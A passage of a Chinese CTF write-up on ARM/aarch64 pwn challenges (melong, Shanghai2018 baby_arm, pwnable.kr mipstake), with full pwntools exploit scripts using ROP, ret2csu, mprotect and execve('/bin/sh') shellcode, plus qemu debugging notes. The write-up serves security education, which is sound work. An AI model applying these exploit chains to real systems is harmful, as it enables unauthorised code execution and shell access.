class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;./&#34;</span><span class="p">,</span> <span class="s2">&#34;./melong&#34;</span><span class="p">])</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./melong&#34;</span><span class="p">,</span> <span class="n">checksec</span> <span class="o">=</span> <span class="bp">False</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./lib/libc.so.6&#34;</span><span class="p">,</span> <span class="n">checksec</span> <span class="o">=</span> <span class="bp">False</span><span class="p">)</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="k">def</span> <span class="nf">check</span><span class="p">(</span><span class="n">height</span><span class="p">,</span> <span class="n">weight</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">height</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">weight</span><span class="p">))</span> <span class="k">def</span> <span class="nf">PT</span><span class="p">(</span><span class="n">size</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;?</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="k">def</span> <span class="nf">write_diray</span><span class="p">(</span><span class="n">payload</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;4&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;6&#34;</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">check</span><span class="p">(</span><span class="mf">1.82</span><span class="p">,</span> <span class="mi">60</span><span class="p">)</span> <span class="n">PT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1"> 0x00011bbc : pop {r0, pc} </span><span class="s1"> &#39;&#39;&#39;</span> <span class="n">pr0</span> <span class="o">=</span> <span class="mh">0x00011bbc</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x54</span><span class="p">),</span> <span class="n">pr0</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">],</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">])</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1"> pwndbg&gt; x/i $pc </span><span class="s1"> =&gt; 0xff6a7a48 &lt;puts+400&gt;: pop {r4, r5, r6, r7, r8, r9, r10, pc} </span><span class="s1"> &#39;&#39;&#39;</span> <span class="n">leak</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;main&#39;</span><span class="p">])</span> <span class="o">*</span> <span class="mi">8</span> <span class="n">write_diray</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span> <span class="n">logout</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;See you again :)</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvn</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libc.address -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">))</span> <span class="c1"># raw_input(&#34;DEBUG: &#34;)</span> <span class="n">check</span><span class="p">(</span><span class="mf">1.82</span><span class="p">,</span> <span class="mi">60</span><span class="p">)</span> <span class="n">PT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="n">rop</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x54</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">pr0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="nb">next</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)))</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">])</span> <span class="n">write_diray</span><span class="p">(</span><span class="n">rop</span><span class="p">)</span> <span class="n">logout</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h2 id="shanghai2018---baby_arm">Shanghai2018 - baby_arm</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/Shanghai2018_baby_arm">binary &amp; exploit here</a></p> <h3 id="静态分析-2">静态分析</h3> <p>题目给了一个 <code>aarch64</code> 架构的文件，没有开 canary 保护</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Shanghai2018_baby_arm <span class="o">[</span>master<span class="o">]</span> check ./pwn + file ./pwn ./pwn: ELF 64-bit LSB executable, ARM aarch64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, <span class="k">for</span> GNU/Linux 3.7.0, BuildID<span class="o">[</span>sha1<span class="o">]=</span>e988eaee79fd41139699d813eac0c375dbddba43, stripped + checksec ./pwn <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/pwn_repo/Shanghai2018_baby_arm/pwn&#39;</span> Arch: aarch64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x400000<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>看一下程序逻辑</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="nf">main_logic</span><span class="p">()</span> <span class="p">{</span> <span class="n">Init</span><span class="p">();</span> <span class="n">write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Name:&#34;</span><span class="p">,</span> <span class="mi">5LL</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0LL</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="mi">512LL</span><span class="p">);</span> <span class="n">sub_4007F0</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">sub_4007F0</span><span class="p">()</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// [xsp+10h] [xbp+10h] </span><span class="c1"></span> <span class="n">read</span><span class="p">(</span><span class="mi">0LL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v0</span><span class="p">,</span> <span class="mi">512LL</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>程序的主干读取了 512 个字符到一个全局变量上，而在 <code>sub_4007F0()</code> 中，又读取了 512 个字节到栈上，需要注意的是这里直接从 <code>frame pointer + 0x10</code> 开始读取，因此即使开了 canary 保护也无所谓。</p> <h3 id="思路-1">思路</h3> <p>理一下思路，可以直接 rop，但我们不知道远程的 libc 版本，同时也发现程序中有调用 <code>mprotect</code> 的代码段</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:00000000004007C8 STP X29, X30, [SP,#-0x10]! .text:00000000004007CC MOV X29, SP .text:00000000004007D0 MOV W2, #0 .text:00000000004007D4 MOV X1, #0x1000 .text:00000000004007D8 MOV X0, #0x1000 .text:00000000004007DC MOVK X0, #0x41,LSL#16 .text:00000000004007E0 BL .mprotect .text:00000000004007E4 NOP .text:00000000004007E8 LDP X29, X30, [SP],#0x10 .text:00000000004007EC RET </code></pre></td></tr></table> </div> </div><p>但这段代码把 <code>mprotect</code> 的权限位设成了 0，没有可执行权限，这就需要我们通过 rop 控制 <code>mprotect</code> 设置如 bss 段等的权限为可写可执行</p> <p>因此可以有如下思路：</p> <ol> <li>第一次输入 name 时，在 bss 段写上 shellcode</li> <li>通过 rop 调用 mprotect 改变 bss 的权限</li> <li>返回到 bss 上的 shellcode</li> </ol> <p><code>mprotect</code> 需要控制三个参数，可以考虑使用 <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium_rop/#ret2csu">ret2csu</a> 这种方法，可以找到如下的 gadgets 来控制 <code>x0, x1, x2</code> 寄存器</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:00000000004008AC LDR X3, [X21,X19,LSL#3] .text:00000000004008B0 MOV X2, X22 .text:00000000004008B4 MOV X1, X23 .text:00000000004008B8 MOV W0, W24 .text:00000000004008BC ADD X19, X19, #1 .text:00000000004008C0 BLR X3 .text:00000000004008C4 CMP X19, X20 .text:00000000004008C8 B.NE loc_4008AC .text:00000000004008CC .text:00000000004008CC loc_4008CC ; CODE XREF: sub_400868+3C↑j .text:00000000004008CC LDP X19, X20, [SP,#var_s10] .text:00000000004008D0 LDP X21, X22, [SP,#var_s20] .text:00000000004008D4 LDP X23, X24, [SP,#var_s30] .text:00000000004008D8 LDP X29, X30, [SP+var_s0],#0x40 .text:00000000004008DC RET </code></pre></td></tr></table> </div> </div><p>最终的 <a href="https://github.com/bash-c/pwn_repo/blob/master/Shanghai2018_baby_arm/solve.py">exp</a> 如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;./pwn&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;l&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-aarch64&#34;</span><span class="p">,</span> <span class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;/usr/aarch64-linux-gnu&#34;</span><span class="p">,</span> <span class="s2">&#34;./pwn&#34;</span><span class="p">])</span> <span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;d&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-aarch64&#34;</span><span class="p">,</span> <span class="s2">&#34;-g&#34;</span><span class="p">,</span> <span class="s2">&#34;1234&#34;</span><span class="p">,</span> <span class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;/usr/aarch64-linux-gnu&#34;</span><span class="p">,</span> <span class="s2">&#34;./pwn&#34;</span><span class="p">])</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;106.75.126.171&#34;</span><span class="p">,</span> <span class="mi">33865</span><span class="p">)</span> <span class="k">def</span> <span class="nf">csu_rop</span><span class="p">(</span><span class="n">call</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">x2</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="mh">0x4008CC</span><span class="p">,</span> <span class="s1">&#39;00000000&#39;</span><span class="p">,</span> <span class="mh">0x4008ac</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">call</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">x0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s1">&#39;22222222&#39;</span> <span class="k">return</span> <span class="n">payload</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./pwn&#34;</span><span class="p">,</span> <span class="n">checksec</span> <span class="o">=</span> <span class="bp">False</span><span class="p">)</span> <span class="n">padding</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="s1">&#39;mov x0, x0&#39;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">execve</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">))</span> <span class="c1"># print disasm(padding * 0x10 + sc)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;Name:&#34;</span><span class="p">,</span> <span class="n">padding</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">sc</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="c1"># io.send(cyclic(length = 500, n = 8))</span> <span class="c1"># rop = flat()</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mi">72</span><span class="p">),</span> <span class="n">csu_rop</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">],</span> <span class="mi">0</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;__gmon_start__&#39;</span><span class="p">],</span> <span class="mi">8</span><span class="p">))</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span><span class="mh">0x400824</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">flat</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;mprotect&#39;</span><span class="p">]))</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;Name:&#34;</span><span class="p">,</span> <span class="n">padding</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">sc</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mi">72</span><span class="p">),</span> <span class="n">csu_rop</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;__gmon_start__&#39;</span><span class="p">],</span> <span class="mh">0x411000</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="mi">7</span><span class="p">))</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span><span class="mh">0x411068</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h3 id="notice">notice</h3> <p>同时需要注意的是，<code>checksec</code> 检测的结果是开了 nx 保护，但这样检测的结果不一定准确，因为程序的 nx 保护也可以通过 qemu 启动时的参数 <code>-nx</code> 来决定（比如这道题目就可以通过远程失败时的报错发现程序开了 nx 保护），老版的 qemu 可能没有这个参数。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Desktop ./qemu-aarch64 --version qemu-aarch64 version 2.7.0, Copyright <span class="o">(</span>c<span class="o">)</span> 2003-2016 Fabrice Bellard and the QEMU Project developers Desktop ./qemu-aarch64 -h<span class="p">|</span> grep nx -nx QEMU_NX <span class="nb">enable</span> NX implementation </code></pre></td></tr></table> </div> </div><p>如果有如下的报错，说明没有 aarch64 的汇编器</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash"><span class="o">[</span>ERROR<span class="o">]</span> Could not find <span class="s1">&#39;as&#39;</span> installed <span class="k">for</span> ContextType<span class="o">(</span><span class="nv">arch</span> <span class="o">=</span> <span class="s1">&#39;aarch64&#39;</span>, <span class="nv">binary</span> <span class="o">=</span> ELF<span class="o">(</span><span class="s1">&#39;/home/m4x/Projects/ctf-challenges/pwn/arm/Shanghai2018_baby_arm/pwn&#39;</span><span class="o">)</span>, <span class="nv">bits</span> <span class="o">=</span> 64, <span class="nv">endian</span> <span class="o">=</span> <span class="s1">&#39;little&#39;</span>, <span class="nv">log_level</span> <span class="o">=</span> 10<span class="o">)</span> Try installing binutils <span class="k">for</span> this architecture: https://docs.pwntools.com/en/stable/install/binutils.html </code></pre></td></tr></table> </div> </div><p>可以参考官方文档的解决方案</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Shanghai2018_baby_arm <span class="o">[</span>master●<span class="o">]</span> apt search binutils<span class="p">|</span> grep aarch64 p binutils-aarch64-linux-gnu - GNU binary utilities, <span class="k">for</span> aarch64-linux-gnu target p binutils-aarch64-linux-gnu:i386 - GNU binary utilities, <span class="k">for</span> aarch64-linux-gnu target p binutils-aarch64-linux-gnu-dbg - GNU binary utilities, <span class="k">for</span> aarch64-linux-gnu target <span class="o">(</span>debug symbols<span class="o">)</span> p binutils-aarch64-linux-gnu-dbg:i386 - GNU binary utilities, <span class="k">for</span> aarch64-linux-gnu target <span class="o">(</span>debug symbols<span class="o">)</span> Shanghai2018_baby_arm <span class="o">[</span>master●<span class="o">]</span> sudo apt install bintuils-aarch64-linux-gnu </code></pre></td></tr></table> </div> </div><blockquote> <p>aarch64 的文件在装 libc 时是 <code>arm64</code>，在装 <code>binutils</code> 时是 <code>aarch64</code></p> </blockquote> <h2 id="more-1">More</h2> <ul> <li>libc_datebase for arm?</li> <li>如何多快好省的分析 strip 后的程序 <ul> <li>后来了解到，对于静态编译的 bianry， 可以使用 lscan, flirt, rizzo, bindiff 等多种方法恢复部分符号表</li> </ul> </li> </ul> <h2 id="后记">后记</h2> <p>后来遇到 pwnable.kr 的 mipstake 这道题目，发现用以前的方法不能运行了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> ls lib ld.so.1 libc.so.6 pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> bat run.sh ───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────── │ File: run.sh ───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/usr/bin/env bash</span> <span class="m">2</span> │ <span class="nb">set</span> -euxo pipefail <span class="m">3</span> │ <span class="m">4</span> │ <span class="nb">unset</span> LD_LIBRARY_PATH <span class="m">5</span> │ qemu-mips -L ./ ./mipstake ───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────── pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> ./run.sh + <span class="nb">unset</span> LD_LIBRARY_PATH + qemu-mips -L ./ ./mipstake qemu: uncaught target signal <span class="m">11</span> <span class="o">(</span>Segmentation fault<span class="o">)</span> - core dumped ./run.sh: 行 5: <span class="m">14538</span> 段错误 qemu-mips -L ./ ./mipstake </code></pre></td></tr></table> </div> </div><blockquote> <p>把 ld.so, libc.so 放到同一目录下而不是使用 <code>-L /usr/mips-linux-gnu/</code>，可以让 gdb-multiarch 在调试时更清楚的识别对应的地址是什么文件而不只是显示一个 <code>[linker]</code>。这是在和 <a href="http://myhackerworld.top/2018/10/22/HITCON-CTF-2018-tooooo/">D4rk3r</a> 师傅讨论一道题目的时候偶然发现的。</p> </blockquote> <p>但 <code>ld.so.1</code>，<code>libc.so.6</code> 在我本地又是可以运行的，说明不是 libc 版本的问题。</p> <p>用 <code>strace</code> 跟踪一下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">unset</span> LD_LIBRARY_PATH pwnable_mipstake <span class="o">[</span>master●●<span class="o">]</span> qemu-mips -strace -L ./ ./mipstake <span class="m">14911</span> brk<span class="o">(</span>NULL<span class="o">)</span> <span class="o">=</span> 0x00412000 <span class="m">14911</span> mmap2<span class="o">(</span>NULL,8192,PROT_READ<span class="p">|</span>PROT_WRITE,MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS,-1,0<span class="o">)</span> <span class="o">=</span> 0x7f7c8000 <span class="m">14911</span> uname<span class="o">(</span>0x7fffeac8<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> <span class="m">14911</span> access<span class="o">(</span><span class="s2">&#34;/etc/ld.so.nohwcap&#34;</span>,F_OK<span class="o">)</span> <span class="o">=</span> -1 <span class="nv">errno</span><span class="o">=</span><span class="m">2</span> <span class="o">(</span>No such file or directory<span class="o">)</span> <span class="m">14911</span> access<span class="o">(</span><span class="s2">&#34;/etc/ld.so.preload&#34;</span>,R_OK<span class="o">)</span> <span class="o">=</span> -1 <span class="nv">errno</span><span class="o">=</span><span class="m">2</span> <span class="o">(</span>No such file or directory<span class="o">)</span> <span class="m">14911</span> openat<span class="o">(</span>AT_FDCWD,<span class="s2">&#34;/etc/ld.so.cache&#34;</span>,O_RDONLY<span class="p">|</span>O_CLOEXEC<span class="o">)</span> <span class="o">=</span> <span class="m">3</span> <span class="m">14911</span> fstat64<span class="o">(</span>3,0x7fffe718<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> <span class="m">14911</span> mmap2<span class="o">(</span>NULL,148329,PROT_READ,MAP_PRIVATE,3,0<span class="o">)</span> <span class="o">=</span> 0x7f7a3000 <span class="m">14911</span> close<span class="o">(</span>3<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> --- SIGSEGV <span class="o">{</span><span class="nv">si_signo</span><span class="o">=</span>SIGSEGV, <span class="nv">si_code</span><span class="o">=</span>1, <span class="nv">si_addr</span><span class="o">=</span>0xcf9e3008<span class="o">}</span> --- qemu: uncaught target signal <span class="m">11</span> <span class="o">(</span>Segmentation fault<span class="o">)</span> - core dumped <span class="o">[</span>1<span class="o">]</span> <span class="m">14911</span> segmentation fault qemu-mips -strace -L ./ ./mipstake </code></pre></td></tr></table> </div> 